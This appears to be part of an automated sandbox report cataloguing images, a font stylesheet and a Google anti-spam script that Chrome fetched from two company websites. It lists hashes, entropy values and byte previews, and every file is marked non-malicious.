                                              SSDEEP:384:pL/YvGO+Vvw6YiISwcSKF6FedNIqtWMq7nCtIaGHeYnlidDhl1J:pDUGZVeKF6FedNIq1q7nCtIasraNlv
                                              MD5:66BE29A23B8D06D429D7521DC65ED84E
                                              SHA1:6C3EBAF736D64086C4D6E3A24C80417A15C8D863
                                              SHA-256:3B46A6006EC88141D3A8D29217ED871619A7158EEE75D45A02DB28C5A5E9345F
                                              SHA-512:8ECE34A843D52C436447379693C07DCF1F615402086559F9021D789DA3624E00E695628A86349D35D4FCA25736FA94C9ADA1627CB16A54B066A7901027AE76C7
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/css/yourstyle.css
                                              Preview:@charset "utf-8";........../**. * @license. *. * Font Family: Sora. * Designed by: Jonathan Barnbrook, Juli.n Moncada. * URL: https://www.fontshare.com/fonts/sora/sora. * . 2022 Indian Type Foundry. *. * Font Styles:. * Sora Variable(Variable font). * Sora Variable Italic(Variable font). * Sora Thin. * Sora Thin Italic. * Sora Extra Light. * Sora Extra Light Italic. * Sora Light. * Sora Light Italic. * Sora Regular. * Sora Italic. * Sora Medium. * Sora Medium Italic. * Sora Semi Bold. * Sora Semi Bold Italic. * Sora Bold. * Sora Bold Italic. * Sora Extra Bold. * Sora Extra Bold Italic. *.*/.../**.* This is a variable font.* You can controll variable axes as shown below:.* font-variation-settings: 'wght' 400.0;.*.* available axes:..* 'wght' (range from 100.0 to 800.0)..*/..@font-face {. font-family: 'Sora-Variable';. src: url('../fonts/sora/Sora-Variable.woff2') format('woff2'),. url('../fonts/sora/Sora-Variable.woff') format('woff'),. url('../fonts/sora/Sora-Variable.ttf') fo
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):4185
                                              Entropy (8bit):7.946165810387893
                                              Encrypted:false
                                              SSDEEP:96:tgPRvAiCHms/xM6g4mTm25CejJgq6KuOhctvRODwhD8ydOg:+ZIiCBxM6gvCe1nniHldOg
                                              MD5:CEFCB1AC8D136024A49DA41F6B1E0033
                                              SHA1:84FE42E40993C44147F7CA15ED728FE551DB02D8
                                              SHA-256:C8312EBFAC348F4A48937B601B0440D68DA6A25234CD83D9A8DE8244275FD309
                                              SHA-512:03E5F03AAAF46106C17932ABDF4A72AF120211D91ECF8286AD6FEF0C5429FDE62595A6F91986B594228A67E310CD7CE21EABA572D9816513A3142A0F90696994
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/meta.png
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE.............i.....}.................b..u..n........f.....c..w..x..x..\.....b.....t...................G...T.....l.....c..n............>..-....N...v......._.. g.i....+u...h.........[....V......u....QIDATh..W.v.0...J.-.6.m....5.......Y.K.6..$...................c..IF%%..........B..r.G..Hr....B.bs..:N.7.....wHvd.oA..,........zy>........i....<. .09=U..a.V.e1).....G. ...o.h..k.,.c]..K.G.W..9.....f..4MQ...f....1.{."@d...b.."Ud.B...C.4..@.@..!R.......".-.zJdL.........\.....%"J...:y[p..._o.vc...P7..H..t.].j.......@./...s#..-...(.,UUo.....yH....<.uE.j.z)F..F.z...P..q.^..YL@@....F]}..I.K].T. O.-......2R4-.v..._.,!B..:q....g...k.Y....6..{s.E..,..8LS...8...j..[..q..%...A. ...5..tuO.......@u].GU.=.)...y...)\.2.c(.<.C=....z...}4..1%gH..E.%..Q...:+r.L.?j....|.....l...104[.U...*..-.<.........bz..1./k...n.7..d.?j;.r.lT.g......<.B=.\......s>YW..@..H.TB.....`.@|_w....u%ur^V...bS.^..@..}...+.?...ZCa..>4j....).
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):7157
                                              Entropy (8bit):7.953901949459065
                                              Encrypted:false
                                              SSDEEP:96:PllcHitlIxv9vk7C1+I4wWHLihk/xwS1u9MEx920SGf3P48GrShaw2JEQt0yizKb:UIIHUCD4waj6MP/Y3VGrI2VCfeUa9Pl
                                              MD5:C0C933C819A729942285CEB4BB699705
                                              SHA1:58F78F512ECEBAA14448233C963B56AD7E405F72
                                              SHA-256:5EB976BDAC67354D8EC305FABB7C1793FBD7636CA0C7E560D92D3066FE5D23A3
                                              SHA-512:4508AC1D9EC100DB3C53BC77125BE8005E2C78250F9D0E919CF1D080856A1995943872490AC5D21100723F888FDB6BDA927A4A49ACE88594B1D317E63BF86254
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/25.png
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 4-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):2694
                                              Entropy (8bit):7.920469198928458
                                              Encrypted:false
                                              SSDEEP:48:c09fi86/M2tSEz1+gNq3uzLkBXbeI5DaqReE/KqHbcVT8bZFBtmXaf:nfi8lLEznq3TBXbVkqkEyEjFBtmXaf
                                              MD5:F8E3136CB0964688A216AAE5042A8A53
                                              SHA1:29156BA2C5BE8474152D98A19972596B269C0986
                                              SHA-256:9E8C28B8716BE409499FAFE32EC8C342145C42CD42F3EC28896078C415D6C511
                                              SHA-512:0F869E85373A1757D4B41260DF88B0D007E49413160919C488DF7ACA480AC3F3FD3E53A777C3CF3BCD3F95BE2CD779A3ABE06C67B1DD46AADEB1AEC5A22EA32D
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/amazon.png
                                              Preview:.PNG........IHDR...d...d.......g...0PLTE222...555,,,...:::$$$......KKK...___...ppp..............IDATX.tX.......a..G...\..x.Y.%.0.,\....V..a.........y.,\cj..5.[..hlM.M0j.&..4.$W..M....4.VJ..5.\0.....{;..w.p73......."... R..;.}.@..|t...P.d...=...H..=..Z.a.e5...%7.N.....{..a.q.p-.?|Q..A.b4K...m.29G.B.[LC.G.....g4;@.<..Sf....=i4.)F.-.[..Z..x..r..K.{...)I...]..3...B........I.l.[...R...F..uQ.}...HO.....<..q.2G].s_l.....X.-q.^<..b...W.. a.P...8.).f~.f.........b..y..ZKI...{s......t..KA|.Yl.j....#.-.a..C4...Cs>FK..0G"X...:.w.....q.l....dn...........'z.kvhb.k..X...,.cm.....O5....@..Nd.k..s.`f...T..S.`......~7-......5...u..".*.^..+(.^..7K....TJ`..l31.ly..:...s_..=.....?qz)..@.<.4C.N. .g..G.Hc..<I.WQ.z.....A.Ru.8..sI%v..M.v--..u..n\....g...T.+HL..*FAW9.De.X.......p..o...$...^.......TI..V....;]K..!=..'...g.b...|%..$.I2....>...,w.D.Gv.....O.J....9.N.'.G....+..IN.4a.v.P....7...!M........Y...y.Z.......^.+m.%.?.g..O.2.........{m-mR._8#Q.....<<....W'..}M.?.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):9168
                                              Entropy (8bit):7.359469681008362
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKw+7O0pk6XJNqmL5GYwjok9gkJ2ZYq:4YNg7efZXJzNGYwjL92ZYq
                                              MD5:859402CC9424834016B258E6DEC1CA01
                                              SHA1:06163F67CBC82D4775BDEEAF2A0EF160D498A1D9
                                              SHA-256:315B1EB4244FACE5374C28F8CBCE606AA0F0DCB42EB944A4F9C13D0633AD60D2
                                              SHA-512:68F8E04CE8A1349422A458055DFE678CF390AB0A5E64E9147F971330D3BB747EDEE77B492F1BA9C26F85B7C41031A7B3EE96E229672CB57C339B17D740D0AEF0
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/49/31df8aaf36f8257a717c2090e4fa4748.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 196x61, components 3
                                              Category:downloaded
                                              Size (bytes):2326
                                              Entropy (8bit):7.726565668160658
                                              Encrypted:false
                                              SSDEEP:48:ueXVrHftdtW4iThDhhhqcGoC0JeWTu9SbO5RkZH2+JZ:u2rftbi118ee6SRYWE
                                              MD5:69023E5B2A2040F40A9A4F86EE22CA28
                                              SHA1:A9D5DD8EF335CA4B0A4CBC6A6875797D1230B2D9
                                              SHA-256:8B5EE668094FACCC85C7CA06417E3DE01224CC392F89F10897D762AB6CB6291E
                                              SHA-512:F89462992ADC9AA0BFC77713922FF1F1FF8CA3E6999463AAA284751385B31F479128EDAF38D62A3BE4DC9987E1B74F7F890DC0E115673F61180A35B9F566F5B6
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/captcha.jpg
                                              Preview:......JFIF.................................... ..............&...#..../ $'),,,. 152*5(+/)...........)...))))))))))))))))))))))))))))))))))))))))))))))))))......=...."......................................4......................!1.AQ.."aq........2R..Bbr...........................................................?...),..f......].@>..J4....[@.r.j...P..NJ.".?].)aH.........8..i....j.BS..............R...eqx.R.3S..<_...7.2....B.[... 3R.<.Ztq.......I*J.$..;.SHR0[...r..J...*..O..8.\78...c. .JO+....~u...X.7..Y./z.)d.5...I....s...J3......kN.@.sI.qcJ....!......t<..b.P.T.R..[.^.v.4LIU*J\..9...../..WE.......Q..K.Q......$...(..A.>w>...A..Bt9V....O...(,..MA.r.p.Y\..5....`1..*....S2z...X>.\..J.......^..:..AL...\.g.<.[.......$OB.T....w..T.....L...X%.h..kA....k...T.%........+.......~..G..j...Z'.S$.^..8%).-..!.e.-j.....]...."D..N.2Y.g..C....an...B....@Q....q......2.0p..6Q~..`phq..!......| ...J[.~."`M.Om.L.!....=...`j..=......#.|.c .4..e...U."..w...N.k?|....2.....?-..g.c..D+
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):32160
                                              Entropy (8bit):7.993644744521096
                                              Encrypted:true
                                              SSDEEP:768:Ys+iynf37R3+moZkqKBcJJnYtu4eC0emuBgy:YvfrR3gKB0t6q3emVy
                                              MD5:C899DA1AB8A7896B147D2D686087C759
                                              SHA1:17256927C0847119B5C2ABEFD347ED48D413E732
                                              SHA-256:9384116F6A09587459A634B2D5C2B2E6BB162702213409A82499418F31C4FB4E
                                              SHA-512:205D3BA58BD263498C820D7E2CAF68B8772B7934D5B4421F40745E3CF195FAC987CBD5CE8F7E7BD3F2909F632E83C1AD044C496BED33DB6E25FCA0C36445EB32
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF.}..WEBPVP8X..............VP8 $}.......*....>.r.T),*."..Z ..gK.............b...w.=7.S<..(.s..:.Ze....p./.5l...$.-.F.....l..>.9..._..8.>..........._...x....~.......rv..._.t?.-@.....s.=5.....g..B.....u..%..h...g.&P.Y..@.+.Oy...P.8...<.'4m. c.......5..l..P.......?..%.k.......4.l.b.Br.&.M.\.z...E..Z.....>...\TQ..L.NB.C...G...1Mj....a.......eaM.../.Ok...Q.........W..).M.]..'`.8R.>..W...,.........$...........Dlh.+.I....E..[Hc$]......h..d5...m..].......1..Z..*......}.l]r.......s...L.S.yL...8.$..9.5&..YS;.(...9s...L3;...H0.Q.r.......I..L.}..e..f.'....[...$.^...3A`L>...1.../_/C....&N.{....2...y.4.Ib.....m.D.....F}t....`......^.J.J...G..t.pwV3......8. .=Yn.1q......&.<....Q......!E}B.z.3T7.3c...2.?.j..@..1........i.d...?Y..4..u..zE.,#-.34>h4..!.......kf.TH...(#.........P....3.Pm..g....;F.|..:9..R%.#.I..|,...p....+...X.....r/l...;_.Z.J.!....8{.a<..?.0'k .E.U .0..9..&...j 9.!.w..{...UX.=..u......j.v.x].@..R_ U.....c.xH.....K....Tk...V..rp..E.h.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 251 x 251, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):36145
                                              Entropy (8bit):7.96611202102991
                                              Encrypted:false
                                              SSDEEP:768:nXu2DuEXNSqaWiV5MfjeV7DmWoAA9atb0bTO:Xu2DCqa55yq5qIUabN
                                              MD5:6A1D43BFE84848198CC10C663B676DB7
                                              SHA1:2EDAA08B89E3B327BE8AC405A32F54185F2D4603
                                              SHA-256:8BEACEB445F0740480B7C7E86A4F583F076E19B78C92E0EBEEC4822265144F73
                                              SHA-512:432627D7C568D8D9D96C7D63A4A8B19864390076006AC4969A4D609C1BDC434E49EDD554654B7BB77C816A699D350DFB60E1271E884D7CAE5DB436125F0037C2
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR..............r.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............tIME......5l].....IDATx..w.&.Y....~.w.....Z.l.mY8..0.s8....d..;~.|....8...0.........Gp.,+k.V...N.7t....+<U.....i.)..y...>...-.4A,.s.C..-u..%...N...!...o.:.....N.u...\...y...?.........]..7P.......w.....t..,.E...{.......V._...=.Q4,A . ......Z..0-.<.... .....a.55!..B.....B..R..H/.<..xS...97..LA.s.!..q. =...q....;. @..P.V...2.B.V"jl.6....3.......X.K.....o...2..%\h.'.....;W.....n..P%...X8w.l."....{..-..F@.F.6.g.^.&;.s!...H}............'...O}..c?.o^.".'..<M.....A..MNx..'...@.u..u....?..U......qN.v....X.mK....Bt].9}.3"....>A.*U.FV5.6n=<.n.7.ML..G.....W.<....i.....Y...>+O.s....`o........(\......... .9!...]...,b_..y..H..9mc.\.....3....."I..L..S.V.NO^.q...>.%/.......v..j......s..,...H}..'.P.......[.4...M..nz..@-.Ba.W?-... ..V..{.....! ..^.s.r......=..RBLM :r.w0..n....<.........O....B`~&.F)......a....S....._9.Ek.8>.s.}..7....,.z.N..d..~.Mt.#9
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):9382
                                              Entropy (8bit):7.9518312245249
                                              Encrypted:false
                                              SSDEEP:192:UIIHUCD4wa3SPWOjGC2XZFltj0hRW1c6CpW5fcCD31YbXz487:K0wDeOqD5oZWWCJI7
                                              MD5:7F31C74A446FF495189BF539A7AFAF79
                                              SHA1:B33E26005D105B0F68642950F8E4FB93500D1CE9
                                              SHA-256:F913708236DAB7EF9F9E8615ADF928E5F99C0F859B447264D78E0540D9B4DC3B
                                              SHA-512:F42104DB6EDAFAA7C045EE94D9A2AA003E7932E62684FDFE5D0F8244A6D5917B19BA4A5B9BFCB98A906033E06AC4CB4F26297CD64EE63F37D5A16729F9EAC8CD
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/al-fahim.png
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (18082)
                                              Category:downloaded
                                              Size (bytes):18702
                                              Entropy (8bit):5.692044148561377
                                              Encrypted:false
                                              SSDEEP:384:9uM0tLMKliViKW2IUZRVgf/AUH4fVYnaeZeRqVCWPb1HLLLn9o5T:M3ZEiwS/AUHy4aenFPJeh
                                              MD5:21A339BE9D607AF00807C153BAADADA6
                                              SHA1:56772DED02008F3B8071695A90269EE3BE2473D8
                                              SHA-256:CC483835A32239478A299DA9A976381CCBCC7F9542AB86AF354FFA5A036CD82C
                                              SHA-512:064A04D0B45C67DDF4A8614270669410A54A7FB8B91B48FF358408B2C9464C9466638E1E4C07098F94A26E9EDD7253CF6F6EE03F5B1C58A232D7C410A00D77BF
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.google.com/js/bg/zEg4NaMiOUeKKZ2pqXY4HMvMf5VCq4avNU_6WgNs2Cw.js
                                              Preview:/* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t */ (function(){var P=function(V,A){if(!(A=(V=null,L).trustedTypes,A)||!A.createPolicy)return V;try{V=A.createPolicy("bg",{createHTML:k,createScript:k,createScriptURL:k})}catch(g){L.console&&L.console.error(g.message)}return V},L=this||self,k=function(V){return V};(0,eval)(function(V,A){return(A=P())&&V.eval(A.createScript("1"))===1?function(g){return A.createScript(g)}:function(g){return""+g}}(L)(Array(Math.random()*7824|0).join("\n")+['(function(){/*',.'',.' Copyright Google LLC',.' SPDX-License-Identifier: Apache-2.0',.'*/',.'var ok=function(V,A,g){if(V.length==3){for(g=0;g<3;g++)A[g]+=V[g];for(g=(V=[13,8,13,12,16,5,3,10,15],0);g<9;g++)A[3](A,g%3,V[g])}},Y=function(V,A,g){if(V==476||V==166)A.T[V]?A.T[V].concat(g):A.T[V]=Vz(g,A);else{if(A.ki&&V!=183)return;V==179||V==247||V==123||V==187||V==36||V==159||V==352||V==43||V==105||V==366?A.T[V]||(A.T[V]=AV(V,46,A,g)):A.T[V]=AV(V,73,A,g)}V==183&&(A.O=F(fal
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):6823
                                              Entropy (8bit):7.944544030321103
                                              Encrypted:false
                                              SSDEEP:96:PllcHitlIxv9vk7C1+I4wWHLihk/xZSiG/BE3j71swoTWWdCca03Pw/vJdzivwUY:UIIHUCD4wa3SHA71sxWWdCtLvJdziu9
                                              MD5:878C1F0299C138A48FEAE58169454901
                                              SHA1:52F3604318B189886614FABF6E197AEEFA7EEB26
                                              SHA-256:34B0F70309C9F6F2431FA9DFD68DEAF747C3DC527D9C1B19B3A62A021C004CD7
                                              SHA-512:B47BEED2442182715C1DC524EA402137239C8456894ACE20218365252BCBC3D1F4CE1F361B38B29A15C99A73E37EEC57105273DC43A1A8C400086F8B3EEC2439
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/his-logo-blue.png
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):13645
                                              Entropy (8bit):7.63563009388887
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwUOiItTBx5uuaDspe905ZklB4b6gn7AYf3z9kxn51hlSUPfuD9u:4YNg7UgT5tB15Za4dkQ3z9kxb6Umw
                                              MD5:C56FD921D2B9F23B7AE1D2F8B3582739
                                              SHA1:3D04FAF0907D221EDA47C8D6F48D223FE6AB2F31
                                              SHA-256:01CA42FDF418879984C6EA6B7E83F31DFADA958A2F7719A10A8AF7DECEE270D7
                                              SHA-512:4A924EFCFEF0C1CCFDF4BD5EFD65D2C50602EA3767305D4A4BB1DBED5263A134A89EE8AC560B41053164D0C86D318827C04F4B2E7F27E16F5FCAE7E7D0A1C4BF
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/18/8a6a88c451aab1431ba398e5b9b65364.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):3763
                                              Entropy (8bit):7.925684236946954
                                              Encrypted:false
                                              SSDEEP:96:aLDKRk/mx5JnEIGgloxIdq+t1RGMsbz2dal5xfkgFc:ysk2GYoP+xGH2e5VkgFc
                                              MD5:1934EBACE8BAD93CA1219C2AA2ACBC15
                                              SHA1:FDD9D68C865E071C2F8B2430AD93E61F928BBE0C
                                              SHA-256:84B6D3873B3DAB81667A51C5011AFC02E313DF4290279C9222A4CBCD31D163D7
                                              SHA-512:4D2B2BE177D33DBFA2D8AD3C1E2097523827295BCB723371720A1D721F0B4389CA7E35E40D3FBE349E74140EB9AD379B2E48306105A1641842D1AB7C22E340CE
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE!........M.O...............K.N............#.....%................................"..A.D............?.Q...T.R...)..............+..I.XI......z.......#.....I.M+..!~...4..........v...."..<..vU..Y.?...i..=.>..\..i.g..X.......S.]......A.....u.)..../..7..]...'{...em....E.g.......ZIDATh...S........|BBv.\...$..A.Q..:jOu.[.....?...=.....g.q.....-..eI.'....4WU..l....q.I.pLI..J....QD.4I.L.ss$..B4vQD.4M#.....+I...".....x0.%.:..P{S.C.x0[/......`6.e.RY|.....,...}.[.b.u..".^`Y.`L.!....`N..&...&u...D08..8|.......9qT..UV{...!.U.....8\z.].u~.....J.k#.\U...T....m"....k..E.....b.X.q.aL&....Go.z{:C.....U.Dv.x.Y,..d...=%...$1.}.D.T.. .nL.HR.n..~{...e.. T.......?d.....x.10M@\..H.w.Z..0.g.qy..^#.67..C>.Y.I....i.t....R.q:c../..wC2.T......w.i.c...".F..].|ys...... {3..%.B.Z.CS...`T..'(a.;w..}.D..a...EW.' ...{.0...C....U+.r.L(......yiN.D.].*.....l.Y!C(......b.I.o.fA...VN......c5y..:.e.8R.v.j.LZ.Nq4.VY.........-?/'.z~.U.,..(.s!B
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):16690
                                              Entropy (8bit):7.985437476335532
                                              Encrypted:false
                                              SSDEEP:384:1sko+f1QeHGvFnXQjqv/uuAMW45SlOWbJUtikhHGFSU:eDsXmvFXQ+vHJElTbaEkhuSU
                                              MD5:1C8494660E66B4B5756EC416BA80646E
                                              SHA1:FE4D803431484F79B03A382A7A58555C39BA0876
                                              SHA-256:77957C9EFD4D8AC98AB665D632012E388FE26EE690F46F2B5D606A767B18EE25
                                              SHA-512:E4B97A82543DBC23E57F8AD2ED42138C5FDCB286637DAFBD13437A199E6006D5F4D35449959916A505E34078CBB0DA4A8B35BAC33D609FF6FAEB90FF7D9A5462
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF*A..WEBPVP8X........+.....ALPHF......m.H1...=."b.:E.0N.....h....D..C.B!.=...^..Y.q...&..j{..~P....+"&.om....&.N...)4.v@e.;`@...(...Z..F..>A..1.......yv.9..|.!,~.G.<..{.%.u..Z...~.gW../..B..n.q...ff%...K.<..../K.a...c4...e...._...n.....)Z^.b..N.sW../..B..v.4..V.c.......BX..q.1.X.....{...V.E,.0l._BX..8..-.Q6z[1.1J ).df...,U.As.Xk.w.0k.z.......<5RO...3.rq...b.....R..<..x...KZ^..!.d.z...r..........CJ)%+.^/..... ..6dn....!..._ff)..H.D5e...#..E.d.YJ..M......S.vS..j........,eyj..M7......,.........p.........{.(.._......_.....~=.n>3...............?.V.-~}}........H...o.oLl.1RL@..K4..Gz...kn{|'H..a...`........kl..2....aV7....G...$^..knq..Q.qq.n.....s..O.....S...z.^....O|JF3.9.hs['.<~.....&].L...x...k_..*9..s|.'...D.`l.l$.s.l'.n._....>J.|b^.~4.t..,I....D.=.z..:'.+\pH.#..r............x..j..H.......e.....W.Ic.]...N...g....,..66.1ov9.w1V..d....9m..F...["..>j.D2.2M..N..]%.*...#..>..H..DKSG.S.i.@...%r...N..k..^..=LFn.....R..7.v.?.3...tU....3..R..G.0.e
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 2000x1500, Scaling: [none]x[none], YUV color, decoders should clamp
                                              Category:dropped
                                              Size (bytes):146776
                                              Entropy (8bit):7.997777101973561
                                              Encrypted:true
                                              SSDEEP:3072:S9vs7sPC3Z+pluyFOJMK+zfwKeZmxXIRxgllrx:kvaS3DFMJMwiVA6jx
                                              MD5:F0C962C85BF4BCDEA310F15B43B58D05
                                              SHA1:D20185D91BB6753ADAC1FA37F1954B29999B052F
                                              SHA-256:3327A036A3C162B539397E3293DA68D8B45FA1319F48745466D93D4E43010915
                                              SHA-512:3472FCF3B9D7A96F1DF078B8C1F8D1EC73FE5DD3A453F904BE6CDF23E0162CE5469DA0C208A1AC2F2294E2D291439C76F83B220E62A5726AEFDA8E7E8C9F9F12
                                              Malicious:false
                                              Reputation:low
